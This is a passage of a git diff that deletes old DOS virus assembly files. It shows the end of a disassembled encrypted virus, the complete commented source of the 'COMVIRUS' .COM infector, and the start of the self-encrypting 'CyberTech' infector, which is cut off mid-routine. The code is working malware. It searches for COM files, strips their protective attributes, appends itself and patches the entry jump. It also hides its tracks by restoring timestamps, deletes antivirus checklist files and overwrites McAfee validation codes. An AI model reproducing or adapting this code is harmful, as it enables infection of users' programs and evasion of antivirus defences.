4Ch, 9Ch, 32h - db 0ECh,0DCh, 48h,0B9h, 1Dh, 62h - db 67h, 0Fh, 98h,0B8h,0B3h, 0Fh - db 9Bh,0B9h, 65h,0DAh,0A5h, 33h - db 0D2h, 3Dh, 54h,0EDh,0D2h, 74h - db 2Bh,0CCh, 30h,0BEh, 2Dh, 25h - db 60h,0FEh,0B8h, 92h,0DDh, 37h - db 99h,0E2h - db 0ECh, 34h,0A5h,0CFh, 13h, 34h - db 29h,0CCh, 48h,0BBh, 9Eh, 27h - db 0CBh,0DBh, 85h,0CDh, 8Eh,0ABh - db 99h - db 0BFh, 48h,0D8h, 3Ah,0FFh,0A6h - db 2Dh, 17h, 14h,0DDh,0A3h, 99h - db 47h, 21h, 31h,0B7h, 45h,0E2h - db 4Eh, 98h, 47h, 61h, 1Dh, 10h - db 48h, 19h, 32h, 15h, 04h,0EFh - db 74h, 9Bh, 41h,0E2h, 74h, 9Ah - db 45h, 61h, 2Ch, 5Ah, 77h, 62h - db 33h,0B7h, 0Ah, 61h, 30h, 56h - db 75h, 26h, 33h,0CFh, 83h, 29h - db 7Ch, 5Eh,0C9h, 46h, 6Fh, 12h - db 3Fh, 9Ah, 9Fh, 33h, 85h, 5Ah - db 33h,0ECh, 35h, 38h, 87h,0A2h - db 41h,0F2h, 3Bh, 9Eh, 01h, 47h - db 0DBh, 51h,0CCh, 8Eh, 77h, 99h - db 0BFh,0BCh, 87h,0A2h, 41h,0F2h - db 0DBh, 9Fh, 01h, 47h, 1Dh - db 67h, 48h - -locloop_21: - retf - xor dh,[bx+di-2] - db 66h, 40h, 9Ah, 25h,0E0h, 31h - db 0B7h, 46h,0E2h, 9Eh, 98h,0F0h - db 66h, 46h, 9Ch, 4Fh,0A5h, 3Ah - db 72h, 7Bh,0D2h, 7Ch,0C9h, 01h - db 47h, 6Bh,0EAh,0CFh, 8Fh, 10h - db 66h, 9Ch,0D2h, 1Ch, 54h,0EDh - db 0E5h,0F0h, 8Ch - db 7Ch, 76h, 1Dh,0A1h,0CBh, 3Eh - db 46h, 7Ch, 32h,0AEh,0D8h - db 41h, 41h,0DAh, 3Ah, 9Eh, 75h - db 5Ch, 33h, 29h,0CCh, 9Ah,0C0h - db 33h, 78h, 21h, 65h,0AAh, 1Eh - db 0EBh, 87h, 90h,0CBh,0ABh, 12h - db 0C7h, 30h,0EBh, 8Fh, 90h,0CBh - db 0DFh, 73h, 99h, 7Ch, 66h,0C1h - db 37h,0B8h, 64h,0CAh, 5Ah, 83h - db 29h,0B9h, 9Ch,0F0h - db 3Ah, 47h - db 9Ah, 8Bh,0D6h, 6Fh,0B7h, 44h - db 63h, 74h, 29h,0E6h, 48h,0BBh - db 9Ch, 8Bh,0D6h, 1Dh,0B7h, 44h - db 63h, 74h, 29h,0E6h, 48h,0BBh - db 9Ch, 8Bh,0EBh,0A7h, 91h,0CBh - db 0D2h, 7Dh, 20h,0DCh, 66h,0FEh - db 0B8h,0BFh, 67h,0F0h, 2Dh,0E3h - db 60h,0FEh,0B8h, 4Fh,0A5h, 26h - db 29h,0DCh - db 40h, 0Bh, 9Eh,0CBh, 13h - db 21h, 61h, 78h, 49h, 35h, 54h -loc_26: - in ax,dx ; port 0, DMA-1 bas&add ch 0 - in ax,0F0h ; port 0F0h ??I/O Non-standard - xchg di,[si+48h] - sbb ax,0CBA1h - db 
61h, 47h, 98h, 0Fh,0D2h, 7Ch - db 54h,0EDh, 15h,0EBh, 60h, 0Fh - db 0D2h, 7Dh, 20h,0CBh, 66h,0BEh - db 0Dh, 7Bh, 67h,0FEh,0B8h,0BEh - db 77h,0DBh,0B4h,0CCh,0D2h, 7Ch - db 20h,0CBh, 66h,0FEh,0B8h,0BEh - db 63h,0DBh,0B8h,0CCh, 8Dh,0C1h - db 14h, 58h,0DBh, 32h, 2Dh, 82h - db 0DFh, 34h, 99h, 01h, 47h, 41h - db 88h, 24h, 69h, 33h, 2Dh, 83h - db 0DFh, 34h, 99h, 01h, 47h, 41h - db 9Ch, 24h, 65h, 33h, 72h, 3Eh - db 0A5h, 87h,0B6h,0CAh,0ABh, 12h - db 1Ah, 0Fh, 79h, 15h, 13h,0CBh - db 61h, 0Fh,0DBh,0B9h, 67h,0F0h - db 2Dh,0E3h, 60h,0FEh,0B8h, 4Fh - db 0A5h, 25h,0BFh, 47h, 69h,0B0h - db 5Ah,0CEh, 40h,0B8h, 8Eh,0CBh - db 0ECh,0F2h,0BDh, 2Ch,0ECh,0D3h - db 0C8h - db 'uc3K$' - db '?9]' - db 0C8h, 63h, 09h, 58h,0B8h, 63h - db 0B9h, 51h, 27h, 64h,0A3h, 5Ah - db 94h, 3Eh, 62h,0CBh,0D2h, 60h - db 87h,0B6h, 01h, 47h,0BFh, 59h - db 42h,0BEh,0DBh, 8Ah,0CDh,0EDh - db 0E0h, 1Ah, 0Eh, 78h, 8Bh, 9Bh - db 0F1h,0ABh, 12h, 12h, 14h, 61h - db 2Ch, 2Dh,0F3h,0EBh,0A7h, 08h - db 0CDh,0DFh, 2Fh, 99h, 01h, 47h - db 1Dh - db 13h, 68h,0F7h - db 32h,0B7h, 46h,0E2h,0A1h, 98h - db 0F1h, 3Ch, 7Eh,0EDh,0CFh, 8Fh - db 0AAh, 99h,0E2h,0EDh,0B7h, 3Ch - db 0CDh, 48h,0BAh, 1Dh, 4Fh, 67h - db 1Dh, 12h, 48h,0C1h, 32h,0B7h - db 45h,0E2h,0B4h, 98h,0E2h - db 0EDh,0B7h, 0Ch,0CDh, 35h, 00h - db 42h,0FFh,0AFh,0E2h, 49h, 46h - db 0AAh,0E2h, 41h, 4Fh, 9Fh, 33h - db 0EDh,0CAh,0E7h,0F0h, 99h,0DCh - db 84h,0C9h, 28h,0C5h,0B5h,0D3h - db 20h,0C8h, 66h, 1Dh, 12h, 58h - db 0FFh, 32h, 4Ah, 2Eh, 36h, 18h - db 5Bh,0E2h,0EFh,0AFh, 3Eh,0CDh - db 48h,0BAh, 05h - db 53h, 67h - db 1Dh, 10h, 48h,0C3h, 32h, 20h - db 0CCh, 64h, 1Dh, 10h, 40h,0F5h - db 32h, 20h, 32h, 99h, 1Dh, 10h - db 40h,0C7h, 32h,0B7h, 47h,0EAh - db 0A6h, 98h, 4Fh,0A7h, 30h,0B7h - db 45h - -locloop_31: - jmp far ptr $-6CB4h - loop $+74h ; Loop if cx > 0 - - sbb ax,0E28Dh - jc $+4Ch ; Jump if carry Set - mov cx,52B8h - xchg ax,si - esc 6,[bp+di] ; coprocessor escape - esc 3,ds:[12ABh][bx] ; coprocessor escape -;* jno loc_30 ;*Jump if not overflw - db 71h,0C9h - db 67h, 
8Bh, 99h, 8Eh, 55h,0FAh - db 0AAh, 1Eh,0ABh, 12h, 2Dh, 8Ch - db 0DFh, 2Fh, 99h, 41h,0F2h,0A2h - db 98h, 01h, 47h,0D8h,0AEh, 5Ch - db 0DEh, 31h,0DBh,0FFh,0AFh, 00h - db 4Bh, 01h, 47h,0DBh, 7Bh,0CCh - db 0DEh, 33h,0DBh,0FFh,0AFh, 00h - db 4Bh, 01h, 47h, 87h,0B6h, 9Fh - db 60h,0FEh,0B8h, 4Fh,0A5h, 29h - db 0BFh, 47h, 61h, 34h,0C2h,0E1h - db 65h, 33h,0B7h, 45h,0E2h,0F4h - db 98h, 78h, 26h, 8Ah, 9Ah,0CCh - db 0EBh,0A7h, 5Fh,0CDh,0ABh, 12h - db 0C3h, 95h,0DEh, 32h,0CEh, 01h - db 47h, 87h,0A7h, 01h, 47h,0DBh - db 0B5h,0CCh,0D2h, 08h, 14h, 58h - db 8Eh, 35h, 54h,0EDh, 8Dh, 09h - db 09h, 78h, 49h, 35h,0CAh - db 01h, 47h,0B8h, 4Ah, 4Fh,0A4h - db 2Dh, 21h,0CCh, 25h,0FEh,0B8h - db 97h, 61h, 1Dh, 10h, 40h,0A5h - db 32h, 18h, 2Dh, 98h, 33h, 21h - db 0CDh, 25h,0FEh,0B8h, 0Fh, 48h - db 0B8h, 15h, 0Fh, 67h, 87h,0B6h - db 0CAh, 35h,0FEh,0B8h, 47h,0B5h - db 0B0h, 5Bh,0D2h,0DEh, 32h,0DAh - db 01h, 47h, 68h, 9Eh, 0Fh,0D2h - db 3Dh - db 0B7h, 46h,0F2h,0F6h, 98h, 01h - db 47h, 87h,0A2h, 41h,0F2h,0FBh - db 9Fh -loc_34: - add [bx-25h],ax - mov word ptr ds:[61CCh],ax - sub al,2Dh ; '-' - db 0D6h,0DCh,0B3h, 99h, 01h, 47h - db 0B8h, 5Fh,0F1h, 66h, 33h,0EDh - db 0EAh, 48h,0B9h, 1Dh, 43h, 67h - db 0Fh, 98h,0B9h, 7Eh, 1Dh, 12h - db 48h,0EFh, 32h,0B7h, 47h,0FAh - db 0B8h, 98h,0C2h, 3Fh, 18h, 52h - db 0CFh,0AEh, 62h,0B7h, 47h,0E2h - db 0B6h, 98h, 9Ch,0ADh, 88h, 99h - db 0CDh, 99h,0D0h - db 2Dh -loc_35: - sub byte ptr [bp+di-55EEh],0Ch - js loc_34 ; Jump if sign=1 - inc cx - ja loc_35 ; Jump if above - xor si,word ptr ds:[0E247h][bx] - dec si - cbw ; Convrt byte to word - inc bp - and [bx+di],si - adc cl,[bx+si+19h] - xor dl,[bx+si] - retf -;* jns loc_36 ;*Jump if not sign - db 79h,0F0h - retf 0EA41h - cmp bx,[bp-48B9h] - mov si,5B05h - db 60h, 18h, 52h, 4Fh, 8Fh, 73h - db 0B7h, 46h, 61h,0B4h, 43h,0E2h - db 0EEh, 34h, 1Eh, 16h, 25h, 71h - db 7Bh, 3Eh, 8Dh, 41h, 09h, 24h - db 69h, 33h,0C2h, 41h,0EAh,0FBh - db 9Fh, 41h,0F2h, 33h, 98h,0E7h - db 0ACh, 87h,0D9h, 01h, 47h, 1Dh - db 13h, 58h, 65h, 
32h,0CAh, 41h - db 0EAh,0FBh, 9Fh, 41h,0FAh, 19h - db 98h,0E7h,0ADh, 1Dh, 13h,0CBh - db 54h,0F1h, 49h, 06h, 48h,0BBh - db 9Eh, 8Fh, 84h,0C0h,0C2h, 0Fh - -crimeIIb endp - -seg_a ends - - - - end start diff --git a/c/CV4-30 (51).ASM b/c/CV4-30 (51).ASM deleted file mode 100755 index e50cc16..0000000 --- a/c/CV4-30 (51).ASM +++ /dev/null 
@@ -1,458 +0,0 @@
-title COMVIRUS
-subttl By Drew Eckhardt
-subttl Latest revision: 4-28-1991
-
-;The author of this virus intends it to be used for educational
-;purposes only, and assumes no responsibilities for its release,
-;dammages resulting from its use, including but not limited to
-;equipment dammage or data loss.
-
-;By assembling or examining this program, The user agrees to accept all
-;responsibility for this programs use, or any portions of the code
-;or concepts contained within. The user also agrees to not publicly release
-;this virus, and to exercise necessary precautions to prevent its escape.
-;The user accepts all responsibility arising from his actions.
-
-;Don't come crying to me if your hard disk gets infected,
-;as THERE IS NO ANTIDOTE. HAHAHAH.
-
-
-;Revision history:
-;4-13: initial bug-free release, size=424 bytes with carrier
-
-;4-15: added no date change support, size=438 bytes with carrier
-
-;4-16: minor documentation changes, size=438 bytes with carrier,
-; NO CODE CHANGE from 4-15 revision
-
-;4-21: fixed missing hex h suffixs, made MASM friendly,
-; fixed incorrect assume statement (assume statements are ignored
-; by A86) enabled hard/floppy infection based on floppy_only status
-; size=438 bytes IF floppy_only, 424 bytes if not, with carrier.
-; minimum virus length = 419 bytes
-
-;4-23: added control over how many programs are infected per run,
-; switched method of infection, from copying to DTA then writing
-; to disk to straight write to disk from memory.
-; size=412 bytes IF floppy_only, 398 bytes if not, with carrier.
-; minimum virus length = 393 bytes
-
-;4-28: used set DTA instead of default DTA/copy command line
-; buffer, which had been used based on incorrect assumption
-; eliminated calls to get time/date, get attribs
-; by using information from find first/find next functions 4eh/4fh
-; made warning optional for reduced space if desired. Also
-; changed mov reg16, bp add reg16, constant to shorter LEA instruction.
-; size=354 bytes IF floppy_only, warning on W/carrier -; 340 bytes IF w/warning & carrier program -; 286 bytes w/o warning, in program -; minimum virus length = 281 bytes for virus itself - -;4-28pm: instead of near CALL-pop sequences everywhere, switched to -; a single CALL near ptr Reference_Point, putting the result into -; si now that (until the end) string mode addressing is not used. -; Changed places where a register (used as an index) -; was being loaded THEN added to a single LEA isntruction -; size = 340 bytes if floppy_only, warning on w/carrier -; size = 326 bytes if w/warning & carrier -; size = 272 w/o warning -; minimum virus length = 267 bytes for the virus itself - -;4-28pm2: Eliminated unecessary flush buffers call. -; size = 336 bytes if floppy_only w/carrier -; size = 322 bytes w/warning & carrier -; size = 268 w/o warning -; minimum virus length = 263 bytes for virus itself - -;4-30: restored 5 bytes of original code at CS:0100 -; before infecting other programs, allowing the -; original code field to be modified so one disk write could be -; used instead of two -; minor documentation revisions - corrected incorrect -; opcodes in documentation -; size = 326 bytes if floppy_only w/carrier -; size = 312 bytes w/warning & carrier program -; size = 258 bytes w/carrier program -; Minimum virus length = 253 bytes for the virus itself - -;NOTE: The program is currently "set up" for A86 assembly with all -;conditional assembly symbols. #IF and #ENDIF should be replaced with -;MASM IFDEF and ENDIF directives for propper operation. -;Also, instead of using EQUates to define control symbols, the /D -;option or DEFINE could be used..... - - -;COMVIRUS.ASM must be assembled into a .COM file inorder to function -;properly. For convieniece, I recommend an assembler like A86 that will -;assemble to a .COM file without having to go through LINK and EXE2BIN - -;As is, it will infect .COM files located on the current disk. 
-;ONLY if it is a floppy disk, ONLY in the root directory. - -;This is a .COM infector virus, which, does nothing other than print a -;warning message, and spread to all files on the default disk IFF it is -;a floppy disk, in the root directory. - -;Theory: -;This is a non - overwriting virus. I took special precautions to preserve -;all functionality of the original program, including command line, parsed FCB, -;and segment register preservation. This makes the virus harder to detect. - -;The .COM file is a memory image - with no relocation table. Thus, it -;is an easy target for a virus such as this. - -;Infected file format -;jmp near ptr xxxx -;cli cli ;ID bytes -;ORIGINAL program code, sans 5 bytes -;5 bytes ORIGINAL program code -;VIRUS - -;This format makes infection VERY simple. We merely check for our signature -;(in this case cli cli (fa fa) - instructions that no programmer in his -;right mind would use - loading the original five bytes in the process. -;These original bytes are written to the end of the program, then -;A jump to where the virus is. - -;While infection is easy, this method presents some coding problems, as the -;virus does not know where in memory it is. Therefor, When we want to access -;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the -;stack which is then popped. Addresses are then calculated relative to this -;via LEA - -;To run the program as normal, command line is restored, registers restored, -;And original code copied onto the first five bytes of the program. 
- - -;Program control symbols defined here -floppy_only equ 1 -infect_per_run equ 1 ;number of programs infected per run -warn_user equ 1 - -_TEXT segment byte 'CODE' - assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT - org 100h - -Start: jmp infect; - -;This is our signature - cli - cli - -;Original code is the data field where we store the original program code -;which will replace our signature and jmp to infect - -Original_Code: int 20h ;five bytes that simply terminate - nop ;the program - nop - nop - - - -;Data for the virus. In a destructive virus, you would want to encrypt -;any strings using a simple one's complement (not) operation so as to -;thwart detection via text search utilities. Since we want detection to -;be easy, this un-encrypted form is fine. - - -Start_Virus: -#IF warn_user - Warning db "This file infected with COMVIRUS 1.0",10,13,'$' -#ENDIF - -;VirusMask is simply an ASCIIZ terminated string of the files we wish to -;infect. - - VirusMask db '*.COM', 0 -Infect: - push ax ;on entry to a .COM program, STACK: - ;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp - ;for the two FCB's in here. Save - ;'em - - ;I use special trickery to find location of data. Since - ;NEAR calls/jmps are RELATIVE, call near ptr find_warn is - ;translated to e8 0000 - which will simply place the location - ;of Reference onto the stack. Our data can be found relative to - ;this point. 
- - call near ptr Reference ;All data is reference realative to - ;Reference - - -Reference: pop bx ;which is placed into bx for LEA - ;instructions - ;bx now contains the REAL address of - ;Reference - ;si points to real address of original - ;code field - lea si, [bx-(offset Reference - offset Original_Code)] - mov di, 0100h ;original code is at 100h - mov cx, 5 ;5 bytes - cld ;from start of buffer - rep movsb ;do it - - mov si, bx ;since BX is used in handle - ;based DOS calls, for the remainder - ;of the virus, si will contain the - ;actual address of reference - -#IF warn_user - - ;Always calculate the address of data relative to known Reference - ;Point - lea dx, [si-(offset Reference - offset Warning)] - mov ah,9h ;DO dos call, DS:DX pointing - int 21h ;to $ terminated string - - ;We want to make sure that the user gets the message - -WaitForKey: - mov ah, 0bh ;we will wait for a keypress - int 21h ;signifying the user has - or al, al ;seen the message. - jz WaitForKey - -#ENDIF - -#IF FLOPPY_ONLY - - ;Since this is a simple demonstration virus, we will only infect - ;.COM files on the default drive IFF it is a floppy disk.... - ;So, we will get information about the disk drive. - - - push ds ;ds:bx returns a byte to - ;media descriptor - - mov ah, 1bh ;get disk information STACK - int 21h ;DOIT ax (drive ID's) - cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp - - pop ds ;restore ds STACK - jne Floppy ;if it was hard.... ax <--sp - jmp near ptr done ;we're nice guys and are done - -Floppy: ;Since it was floppy, we can go on with the infection! -#ENDIF - ;The default DTA, as is will give us problems. The designers of - ;MickeySoft DOS decided to put default DTA at ofset 128 in - ;the PSP. PROBLEM: This is also where the user's precious command - ;line is, and we MUST remain undectected. SO.... we allocate a - ;DTA buffer on the stack. 43 bytes are needed, 44 will do. 
- - sub sp, 44 ;allocate space for findfirst/findnext DTA - mov bp, sp ;set up bp as a reference to this area - - ;Set the DTA - mov dx, bp ;point DS:DX to our area - mov ah, 1ah ;set DTA - int 21h - - ;Set up pointers to data in DTA - dta equ word ptr [bp] - file_name equ word ptr [bp+1eh] - attributes equ byte ptr [bp+15h] - time_stamp equ word ptr [bp+16h] - date_stamp equ word ptr [bp+18h] - file_size equ dword ptr [bp+1ah] - - ;We dynamically allocate a variable to store the number of programs STACK - ;The virus has infected. FCB drives - ; bp--> 44 byte DTA - infected_count equ byte ptr[bp-2]; Infected_Count - xor ax, ax ;zero variable, sp--> buffer (6 bytes) - push ax ;allocate it on the stack - sub sp, 6 ;allocate small buffer - - ;Now, we begin looking for files to infect. - lea dx, [si - (offset Reference - offset VirusMask)] - ;DS:DX points to the search string STACK - mov ah, 4eh ;find first matching directory entry FCB drives (word) - mov cx, 111b ;only default directory, FILES - ;hidden, system and normal - int 21h ;doit bp--> 44 byte DTA buffer - ; infected count (word) - jnc Research ;carry is clear when a file was sp--> 6 byte buffer - jmp nofile ;found. - - -ReSearch: -;All handle based DOS calls take a pointer to an ASCIIZ file name in ds:dx - lea dx, file_name - -;Since this is a virus, we want to infect files that can't be touched by -;DOS commands, this means readonly, system, and hidden files are at our -;mercy. To do this, we rely on the findfrst/next attributes and other data -;to restore the attribute byte to the original settings. 
get/SET can fix -;them to be suitable - mov cl, attributes - and cl, 11100000b ;not readonly, system, or hidden STACK - ; FCB drives - mov ax, 4301h ;set attributes bp--> buffer (44 bytes) - int 21h ; buffer (6 bytes) - ; sp--> infected_count - jnc NoError ;check for error - jmp Restore_Flags -NoError: - mov ax, 3d02h ;now, open file using handle, - ;read/write access - int 21h ; - jnc NoError2 ;IF there was an error, we are done - jmp Restore_Flags ;But we don't need to commit or close - -NoError2: - mov bx, ax ;The handle was returned in ACC. - ;Howwever, all handle based DOS - ;calls expect it in BX - - -;We don't want to infect the program more than once, so we will -;check to see if it is infected. - - - mov ax, 4200h ;seek relative to start of file - ; bx contains handle from open operation - xor cx,cx ;cx:dx is file pointer - xor dx, dx ; - int 21h ;DOIT - -;Now, we will read in enough data to see if we have our virus signature. - mov ah, 3fh ;read data - lea dx, [si-(offset reference-offset original_code)] - ;into original_code buffer - mov cx, 5 ;5h bytes - ; bx contains handle from last operation - int 21h - - cmp word ptr [si-(offset reference-offset original_code)+3], 0fafah - jne GoApe ;if we aren't already infected, - jmp Error ;go for it - -GoApe: -;Since it is safe to infect, we will - mov ax, 4202h ;seek end of file - xor cx, cx - xor dx, dx - int 21h - - or dx, dx ;check for valid .COM format - jz Less_Than_64K - jmp Error - -Less_Than_64K: - -;Now, we must calculate WHERE the jump will be to. 
Let's examine the program -;Structure: -;jmp near ptr xxxx -;Cli Cli }These add up to the original length -;Orignal code sans 5 bytes - -;Original_Code (5 bytes) }The length of all virus data -;Other virus data is equal to the difference in -;Infect the addresses of Infect and Original_Code - -;End_Virus - - -;Thus, the jump must jump TO (offset Infect- offset Original_Code + Original_Length + origin) -;However, in the 80x86, NEAR jumps are calculated as an offset from the position -;of the next statement to execute (because of fetch/execute cycle operation). - -;Since jmp near ptr xxxx takes 3 bytes, the next instruction is THREE bytes from -;The 0E9h jmp near instruction, so xxxx will be (offset Infect-Offset Original_Code -;+Original_Length-3); - - ;Since AX already contains the original length, we will merely add - ;Space for the virus data, and take care of the three bytes - ;of code generated by the jmp near instruction. - - add ax, (offset Infect - Offset Original_Code -3) - - ;calculate jump address - mov byte ptr [bp-8], 0e9h ;jmp near instruction - mov word ptr [bp-7], ax ;offset for near jmp - mov word ptr [bp-5], 0fafah ;cli cli - - mov ax, 4200h ;seek begining of file - xor cx, cx - mov dx, cx - int 21h - - mov ah, 40h ;write patched code - mov cx, 5 ;5 bytes of code - lea dx, [bp-8] ;our buffer - int 21h - - mov ax, 4202h ;seek EOF - xor cx, cx - xor dx, dx - int 21h - - - lea dx, [si - (offset Reference - offset Original_Code)]; set start - mov cx, (offset End_Virus - offset Original_Code) ;set length - mov ah, 40h ;append virus to file - int 21h ;doit - - inc infected_Count ;bump up the number of programs infected - -Error: mov dx,date_stamp ;restore date - mov cx,time_stamp ;restore time - mov ax, 5701h ;set them - int 21h - - mov ah, 3eh ;close file - int 21h - -Restore_Flags: - xor ch, ch ;zero hi byte flags - mov cl,attributes ;restore flags - lea dx, file_name ;ds:dx points to ASCIIZ string - ;in the buffer, offset 1eh contains - ;the file name 
- mov ax, 4301h ;get/SET flags - int 21h ;Doit - -DoAgain:;See if we're done infecting - cmp infected_count, infect_per_run - jae NoFile ;if we're done, same as no new file - - - mov ah, 4fh ;find next - int 21h - - jc NoFile ;if carry is clear, DOIT again! - jmp ReSearch - -;Since we have no more files, we will restore things to normal. -NoFile: - mov dx, 80h ;reset default dta at DS:80h - mov ah, 1ah ;set DTA - int 21h - - add sp, 52 ;deallocate buffers and infected_count - - - -;Put original code of program BEFORE it was infected back in place! - - -Done: - pop ax ;restore ax - - - ;FUNKY code! In the 80x86, all NEAR or SHORT jmp opcodes take - ;a RELATIVE address...... BUT a retn opcode pops a near absolute - ;address of the stack - saves us the trouble of some calculating - ;relative to here, and the trouble of a self-modifying - ;far absolute jmp! (5 bytes) - - mov bx, 0100h - push bx - ret ;easiest jump to cs:100 - -End_Virus: -_TEXT ends -end start - diff --git a/c/CYBERTCH (52).ASM b/c/CYBERTCH (52).ASM deleted file mode 100755 index 7446f9a..0000000 --- a/c/CYBERTCH (52).ASM +++ /dev/null 
@@ -1,427 +0,0 @@ -; -; CyberTech Virus - Strain A John Tardy (C) 1992 -; -; Written in A86 V3.22 -; -; Description : This is a Non-Resident Self-Encrypting .COM file infector -; which infects COM files in the current directory. It will -; remove CHKLIST.CPS from the current directory after it has -; infected a program. CHKLIST.CPS is a file which is used by -; VDEFEND of PCSHELL and Central Point AntiVirus. When a -; validation code is added by SCAN of McAfee, it will overwrite -; the code, so the file is no longer CRC protected anymore. -; After 1992, the virus activated. It then displays a message -; that your system has been infected. The virus will remove -; itself from the infected file and completely restore it. If -; a validation code was added, it is lost, but the file is not -; corrupted and will function normally. Even when the file is -; compressed afterwards by an executable file compressor, it is -; uncompressed. Before 1993, the virus sometimes display it's -; copyright. This is caused when the random encryption counter -; is a 0. It will redefine it, so there is no visible text in -; the virus. It checks also if there is enough diskspace -; aveable and installs a critical error handler. -; - Org 0h ; Generate .BIN file - -Start: Jmp MainVir ; Jump to decryptor code at EOF - - Db '*' ; Virus signature (very short) - -; -; Decryptor procedure -; - -MainVir: Call On1 ; Push offset on stack - -On1: Pop BP ; Calculate virus offset - Sub BP,Offset MainVir+3 ; - - Push Ax ; Save possible error code - - Lea Si,Crypt[BP] ; Decrypt the virus with a - Mov Di,Si ; very simple exclusive or - Mov Cx,CryptLen ; function. 
-Decrypt: Lodsb ; - Xor Al,0 ; - Stosb ; - Loop Decrypt ; - -DecrLen Equ $-MainVir ; Length of the decryptor - -; -; Main initialization procedure -; - -Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at - Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) - Mov Cs:Start+100h,Ax ; - Mov Cs:Start[2]+100h,Bx ; - - Xor Ax,Ax ; Get original interrupt 24 - Push Ax ; (critical error handler) - Pop Ds ; - Mov Bx,Ds:[4*24h] ; - Mov Es,Ds:[4*24h]+4 ; - - Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place - Mov Word Ptr Cs:OldInt24+2[Bp],Es ; - - Lea Bx,NewInt24[Bp] ; Install own critical error - Push Cs ; handler to avoid messages - Pop Es ; when a disk is write - Mov Word Ptr Ds:[4*24h],Bx ; protected and such things - Mov Word Ptr Ds:[4*24h]+2,Es ; - Push Cs ; - Pop Ds ; - - Mov Ah,30h ; Check if DOS version is - Int 21h ; 3.0 or above for correct - Cmp Al,3 ; interrupt use - Jae On2 ; - Jmp Ready ; - -On2: Mov Ax,3600h ; Check if enough disk space - Xor Dx,Dx ; is aveable for infecting - Int 21h ; (3 clusters should be - Cmp Bx,3 ; enough i think) - Ja TestDate ; - Jmp Ready ; - -TestDate: Mov Ah,2ah ; Check if 1992 is past time - Int 21h ; already - Cmp Cx,1993 ; - Jae Clean ; - 1993 or more - Jmp NoClean ; - Not 1993 or more - -; -; Main Cleanup procedure -; - -Clean: Push Cs ; Show message that the - Pop Ds ; system has been infected - Mov Ah,9 ; - Lea Dx,Removed[Bp] ; - Int 21h ; - - Mov Ah,1ah ; Move DTA to a safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ax,Cs:[2ch] ; Find the name of the - Mov Ds,Ax ; program that is now - Mov Si,0 ; executed (me must search in - Mov Cx,4000h ; the DOS environment for -Seeker: Lodsb ; safe tracking of the name - Cmp Al,1 ; - Je On3 ; - Loop Seeker ; - -On3: Inc Si ; Transfer the found name - Push Cs ; to a safe address in memory - Pop Es ; - Mov Di,0fd80h ; - Mov Cx,80h ; -Trans: Lodsb ; - Cmp Al,0h ; - Jne Verder ; - Xor Ax,Ax ; -Verder: Stosb ; - Loop Trans ; - - Push Cs ; Read file attributes and - Pop Ds ; check 
if an error has - Mov Ax,4300h ; occured - Mov Dx,0fd80h ; - Int 21h ; - Jnc DeInfect ; - No error, DeInfect - Jmp Ready ; - Error, Ready - -DeInfect: Push Cx ; Store old file attributes - - Mov Ax,4301h ; Clear file attributes - Xor Cx,Cx ; (for read only etc.) - Int 21h ; - - Mov Ax,3d02h ; Open the file - Int 21h ; - - Mov Bx,Ax ; Read file date/time stamp - Mov Ax,5700h ; and store it on the stack - Int 21h ; for later use - Push Cx ; - Push Dx ; - - Mov Ah,3eh ; Close file - Int 21h ; - - Mov Dx,0fd80h ; Create a new file with the - Xor Cx,Cx ; same name - Mov Ah,3ch ; - Int 21h ; - - Mov Bx,Ax ; store file handle in BX - - Mov Ah,40h ; write memory image of host - Mov Dx,100h ; program to file (the original - Mov Cx,Bp ; file is now back again) - Sub Cx,0fch ; - Int 21h ; - - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Pop Cx ; restore file attributes - Mov Ax,4301h ; - Mov Dx,0fd80h ; - Int 21h ; - - Push Cs ; jump to ready routine - Pop Ds ; (shutdown of the virus) - Jmp Ready ; - -; -; Main viral part -; - -NoClean: Mov Ah,1ah ; Store DTA at safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ah,4eh ; FindFirsFile Function - -Search: Lea Dx,FileSpec[BP] ; Search for filespec given - Xor Cx,Cx ; in FileSpec adress - Int 21h ; - Jnc Found ; Found - Found - Jmp Ready ; Not Found - Ready - -Found: Mov Ax,4300h ; Get file attributes and - Mov Dx,0fd1eh ; store them on the stack - Int 21h ; - Push Cx ; - - Mov Ax,4301h ; clear file attributes - Xor Cx,Cx ; - Int 21h ; - - Mov Ax,3d02h ; open file with read/write - Int 21h ; access - - Mov Bx,5700h ; save file date/time stamp - Xchg Ax,Bx ; on the stack - Int 21h ; - Push Cx ; - Push Dx ; - - Mov Ah,3fh ; read the first 4 bytes of - Lea Dx,OrgPrg[BP] ; the program onto OrgPrg - Mov Cx,4 ; - Int 21h ; - - Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file - Cmp Ax,'ZM' ; - Je ExeFile ; - - Cmp Ax,'MZ' ; Check if renamed weird exe- - Je 
ExeFile ; file - - Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected - Cmp Ah,'*' ; - Jne Infect ; - -ExeFile: Call Close ; If one of the checks is yes, - Mov Ah,4fh ; close file and search next - Jmp Search ; file - -FSeek: Xor Cx,Cx ; subroutine to jump to end - Xor Dx,Dx ; or begin of file - Int 21h ; - Ret ; - -Infect: Mov Ax,4202h ; jump to EOF - Call FSeek ; - - Cmp Ax,0f900 ; Check if file too large - Jae ExeFile ; if yes, goto exefile - - Cmp Ax,10 ; Check if file too short - Jbe ExeFile ; if yes, goto exefile - - Mov Cx,Dx ; calculate pointer to offset - Mov Dx,Ax ; EOF-52 (for McAfee validation - Sub Dx,52 ; codes) - - Mov Si,Cx ; move file pointer to the - Mov Di,Dx ; calculated address - Mov Ax,4200h ; - Int 21h ; - - Mov Ah,3fh ; read the last 52 bytes - Mov Dx,0fb00h ; of the file - Mov Cx,52 ; - Int 21h ; - - Cmp Ds:0Fb00h,0fdf0h ; check if protected with the - Jne Check2 ; AG option - Cmp Ds:0fb02h,0aac5h ; - Jne Check2 ; - - Mov Ax,4200h ; yes - let virus 